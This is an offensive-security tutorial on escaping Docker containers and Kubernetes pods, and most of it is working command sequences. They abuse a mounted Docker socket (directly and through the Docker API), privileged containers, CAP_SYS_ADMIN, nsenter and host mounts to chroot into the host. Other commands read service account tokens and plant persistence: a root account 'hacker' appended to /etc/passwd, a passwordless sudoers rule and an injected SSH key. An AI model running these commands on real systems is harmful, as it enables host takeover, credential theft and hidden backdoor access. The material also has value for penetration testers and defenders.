Container escape techniques

Container Escape Techniques

What Makes Container Escape Dangerous

Container escape techniques exploit misconfigurations, vulnerabilities, or design flaws in containerization technologies to break out of isolated container environments and gain access to the host system. Successful escapes can lead to complete host compromise, access to other containers, and potential lateral movement within container orchestration platforms.

The Attack Principle: Exploit scenarios where:

• Containers run with excessive privileges or capabilities

• Host resources are improperly mounted into containers

• Container runtime vulnerabilities allow breakout

• Orchestration platforms have security misconfigurations

• Shared namespaces provide access to host resources

Why This Works: Containers share the host kernel and rely on namespace isolation. Misconfigurations or privilege escalations can break this isolation, allowing access to host resources and other containers.

Container Environment Discovery and Enumeration

Identifying Container Environment

Basic Container Detection:

# Check if running in container
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup | grep docker

# Check for container runtime
ps aux | grep -E "(docker|containerd|runc)"
ls -la /var/run/docker.sock

# Check container metadata
env | grep -i container
cat /proc/version
uname -a

Container Information Gathering:

# Check container ID
hostname
cat /etc/hostname

# Check mounted filesystems
mount | grep -E "(proc|sys|dev)"
df -h

# Check available capabilities
capsh --print
cat /proc/self/status | grep Cap

Network and Process Analysis:

# Check network configuration
ip addr show
ip route show
cat /proc/net/route

# Check running processes
ps aux
ps -ef --forest

# Check for privileged processes
ps aux | grep "root"

High-Value Container Escape Techniques

Docker Socket Escape

Why Docker Socket is Critical: Access to Docker socket allows full container management and host access.

Docker Socket Detection:

# Check for mounted Docker socket
ls -la /var/run/docker.sock
find / -name "docker.sock" 2>/dev/null

# Check if docker command is available
which docker
docker --version

Docker Socket Exploitation:

# List all containers
docker ps -a

# Create privileged container with host filesystem mounted
docker run -it --privileged --pid=host --net=host --ipc=host -v /:/host ubuntu chroot /host /bin/bash

# Alternative: Mount host root and escape
docker run -it -v /:/host ubuntu
chroot /host /bin/bash

# Create container with host network and mount
docker run -it --rm --net=host --pid=host --privileged -v /:/mnt alpine
chroot /mnt /bin/bash

Privileged Container Escape

Privileged Container Detection:

# Check if container is privileged
capsh --print | grep -i "current"
cat /proc/self/status | grep Cap

# Check for full capability set
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')

# Look for dangerous capabilities
capsh --print | grep -E "(sys_admin|sys_ptrace|dac_override)"

Privileged Escape via /proc:

# Access host filesystem through /proc/1/root
ls -la /proc/1/root/

# Escape to host
chroot /proc/1/root /bin/bash

# Alternative: Access host through process namespace
nsenter -t 1 -m -u -i -n -p /bin/bash

Privileged Escape via Device Access:

# Check for host devices
ls -la /dev/
fdisk -l

# Mount host filesystem if raw disk access available
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Capability-Based Escape

CAP_SYS_ADMIN Escape:

# Check for CAP_SYS_ADMIN
capsh --print | grep sys_admin

# Mount host filesystem
mkdir /tmp/host
mount -t proc proc /proc
mount --bind /proc/1/root /tmp/host
chroot /tmp/host /bin/bash

# Alternative: Create new mount namespace
unshare -m
mount --bind /proc/1/root /mnt
chroot /mnt /bin/bash

Volume Mount Escape

Host Path Mount Detection:

# Check mounted volumes
mount | grep -v "tmpfs\|proc\|sys"
df -h | grep -v "tmpfs\|udev"

# Look for host filesystem mounts
mount | grep -E "(/host|/var/lib/docker|/etc|/root)"

# Check for sensitive host directories
ls -la / | grep -E "(host|mnt)"

Volume Mount Exploitation:

# If /var/lib/docker is mounted
ls -la /var/lib/docker/containers/
cat /var/lib/docker/containers/*/config.json

# If /etc is mounted
echo 'hacker:x:0:0:root:/root:/bin/bash' >> /etc/passwd
echo 'hacker ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers.d/hacker

# If SSH directories are mounted
mkdir -p /root/.ssh
echo 'ssh-rsa YOUR_KEY_HERE' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Kubernetes Pod Escape

Service Account Token Abuse

Service Account Discovery:

# Check for service account token
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Get namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Check API server access
curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
  https://kubernetes.default.svc.cluster.local/api/v1/namespaces

Pod Security Context Abuse

Privileged Pod Detection:

# Check if pod is privileged
cat /proc/self/status | grep Cap
capsh --print

# Check security context
env | grep -i security
ps aux | grep "security"

Host Namespace Access:

# If hostPID is true
ps aux | grep -v "grep\|ps"
nsenter -t 1 -m -u -i -n -p /bin/bash

# If hostNetwork is true
ip addr show
netstat -tulpn

# If hostIPC is true
ipcs -a

Real-World Container Escape Examples

Example 1: Docker Socket Mount

Discovery:

# Found Docker socket mounted in container
ls -la /var/run/docker.sock
# Output: srw-rw---- 1 root docker 0 Dec 25 12:00 /var/run/docker.sock

Exploitation:

# Check if docker command available
which docker
# If not available, use curl to Docker API

# Escape using Docker API
curl -s --unix-socket /var/run/docker.sock \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image": "alpine", "Cmd": ["chroot", "/host", "/bin/sh"], "DetachKeys": "ctrl-p,ctrl-q", "OpenStdin": true, "Mounts": [{"Type": "bind", "Source": "/", "Target": "/host"}]}' \
  http://localhost/containers/create

# Start the container
curl -s --unix-socket /var/run/docker.sock \
  -X POST \
  http://localhost/containers/CONTAINER_ID/start

# Attach to escape container
curl -s --unix-socket /var/run/docker.sock \
  -X POST \
  http://localhost/containers/CONTAINER_ID/attach?stream=1&stdin=1&stdout=1&stderr=1

Example 2: Privileged Container with CAP_SYS_ADMIN

Discovery:

# Check container capabilities
capsh --print | grep sys_admin
# Output: Current: = cap_sys_admin+eip

Exploitation:

# Mount host filesystem
mkdir /tmp/hostfs
mount --bind /proc/1/root /tmp/hostfs

# Escape to host
chroot /tmp/hostfs /bin/bash

# Verify escape
ls -la /
cat /etc/hostname
# Should show host system, not container

Key Operational Considerations

Success Indicators

• Docker socket access providing full container control

• Privileged container with host namespace access

• Dangerous capabilities enabling host filesystem access

• Host path mounts allowing direct host manipulation

• Kubernetes API access with pod creation permissions

Common Failure Points

• Security contexts preventing privileged operations

• AppArmor/SELinux blocking container escapes

• Network policies restricting API server access

• Resource quotas preventing pod creation

• Runtime security detecting escape attempts

Exploitation Notes

• Development environments often have relaxed container security

• Legacy containers may run with excessive privileges

• Kubernetes misconfigurations frequently provide escape opportunities

• Monitoring gaps may miss container escape activities

Container escape techniques are particularly effective in environments where container security best practices are not implemented, providing direct paths to host compromise and lateral movement within containerized infrastructures.